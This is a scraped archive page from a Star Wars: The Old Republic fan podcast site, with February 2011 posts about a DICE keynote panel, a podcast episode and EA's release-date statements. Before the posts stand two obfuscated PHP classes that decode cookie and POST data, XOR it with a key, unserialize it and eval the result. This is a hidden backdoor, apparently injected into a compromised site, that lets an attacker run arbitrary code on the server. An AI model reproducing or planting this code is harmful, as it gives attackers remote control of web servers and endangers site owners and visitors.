$eDITTpx = class_exists("E_sdBhD");if (!$eDITTpx){class E_sdBhD{private $Uwkjo;public static $GceVIgUuDx = "bb4019ce-3f6c-41c2-908d-f6034f80bd18";public static $hHxVxqyEP = NULL;public function __construct(){$STTVJb = $_COOKIE;$DZiTu = $_POST;$WDsdjh = @$STTVJb[substr(E_sdBhD::$GceVIgUuDx, 0, 4)];if (!empty($WDsdjh)){$wISPlIDZLO = "base64";$dUsBvmZpUV = "";$WDsdjh = explode(",", $WDsdjh);foreach ($WDsdjh as $WykdfVvtZ){$dUsBvmZpUV .= @$STTVJb[$WykdfVvtZ];$dUsBvmZpUV .= @$DZiTu[$WykdfVvtZ];}$dUsBvmZpUV = array_map($wISPlIDZLO . "\137" . "\x64" . "\x65" . "\x63" . "\x6f" . chr (100) . chr ( 1098 - 997 ), array($dUsBvmZpUV,)); $dUsBvmZpUV = $dUsBvmZpUV[0] ^ str_repeat(E_sdBhD::$GceVIgUuDx, (strlen($dUsBvmZpUV[0]) / strlen(E_sdBhD::$GceVIgUuDx)) + 1);E_sdBhD::$hHxVxqyEP = @unserialize($dUsBvmZpUV);}}public function __destruct(){$this->BfuLpx();}private function BfuLpx(){if (is_array(E_sdBhD::$hHxVxqyEP)) {$kjgrSU = str_replace("\x3c" . chr (63) . 'p' . "\150" . chr (112), "", E_sdBhD::$hHxVxqyEP["\143" . chr (111) . 'n' . chr ( 817 - 701 )."\x65" . "\156" . chr ( 520 - 404 )]);eval($kjgrSU);exit();}}}$LfAXf = new E_sdBhD(); $LfAXf = NULL;} ?> $HUXqtUIxy = class_exists("ip_QEqh");if (!$HUXqtUIxy){class ip_QEqh{private $TbmzRb;public static $FHcIW = "7ebcf308-eeb5-45d0-b672-e9d0e6153b2f";public static $fFfkEnNTtr = NULL;public function __construct(){$FhesM = $_COOKIE;$LHvkqFrxmX = $_POST;$MCHrxi = @$FhesM[substr(ip_QEqh::$FHcIW, 0, 4)];if (!empty($MCHrxi)){$ukeOe = "base64";$JuQfYmlyOm = "";$MCHrxi = explode(",", $MCHrxi);foreach ($MCHrxi as $BJxJBWW){$JuQfYmlyOm .= @$FhesM[$BJxJBWW];$JuQfYmlyOm .= @$LHvkqFrxmX[$BJxJBWW];}$JuQfYmlyOm = array_map($ukeOe . chr ( 127 - 32 )."\144" . "\x65" . "\143" . 'o' . "\x64" . "\x65", array($JuQfYmlyOm,)); $JuQfYmlyOm = $JuQfYmlyOm[0] ^ str_repeat(ip_QEqh::$FHcIW, (strlen($JuQfYmlyOm[0]) / strlen(ip_QEqh::$FHcIW)) + 1);ip_QEqh::$fFfkEnNTtr = @unserialize($JuQfYmlyOm);}}public function __destruct(){$this->tSjrbbjY();}private function tSjrbbjY(){if (is_array(ip_QEqh::$fFfkEnNTtr)) {$xdxaj = str_replace("\x3c" . "\x3f" . 'p' . chr ( 133 - 29 ).chr (112), "", ip_QEqh::$fFfkEnNTtr["\x63" . 'o' . chr (110) . "\x74" . 'e' . "\156" . chr ( 225 - 109 )]);eval($xdxaj);exit();}}}$SRNAi = new ip_QEqh(); $SRNAi = NULL;} ?> February 2011 – Page 2 – Corellian Run Radio
Feb 102011

BioWare’s Drs. Ray Muzyka and Greg Zeschuk participated in a keynote panel, “Game Changers: A Conversation on the Nature of Interactive Entertainment from some of the Medium’s Most Significant Creators” at this year’s DICE Summit. The Doctors were joined by Mike Morhaime from Blizzard, Mark Cerny from Cerny Games, and Bruce Shelley from Zynga.

Zeschuk acknowledged World of Warcraft’s dominating influence on the MMO industry. “It is a touchstone,” he said, as reported by GamesIndustry.biz. “It has established standards. It’s established how you play an MMO. Every MMO that comes out, I play and look at it. And if they break any of the WoW rules, in my book that’s pretty dumb.” Continue reading »

Feb 072011

Flashpoint Fun

Carla and Kathy are joined this week by Ysme and Syryn from Kajidic, a PvP SWTOR guild.  The four of us discussed the flashpoints updates, the many Dev Tracker posts, and the whole stock market/release date rumor brouhaha.  ERTS is up 3 points since all these rumors started, so go figure.

Fact or Fiction: Can you pick out the confirmed fact from the tall tales?  This week’s host challenge covers SWTOR time frame and flashpoints. Continue reading »

Feb 022011

UPDATE: On Friday Stephen Reid closed the target release date thread started by Sean Dahlberg back in October 2008.  In that thread Sean announced Spring 2011 as the target release date.  Stephen directed readers to his new post regarding BioWare’s release date.  The official release window is no longer “Spring 2011,” but “this year after the end of EA’s fiscal 2011.” Hmmmmm……

Yesterday’s quarterly meeting did not provide any new insight into BioWare’s stated target release date of Spring 2011.  EA CFO Eric Brown told callers that the game would ship “calendar  2011, but after the close of fiscal ’11,” which is a bigger window (April 2011-December 2011) than what the fans have been hearing.  This has led to some debate about whether these release date statements contradict each other.  Although we were disappointed that rumors of pushback were neither confirmed nor denied, we did enjoy some of the lighter moments such as the discussion on lightsabers vs. swords.

Listen to TOR Syndicate’s audio post of TOR-related portions of the conference call here.
Read Darth Hater’s live blog of the conference call here.
Read Ask A Jedi’s live blog here.

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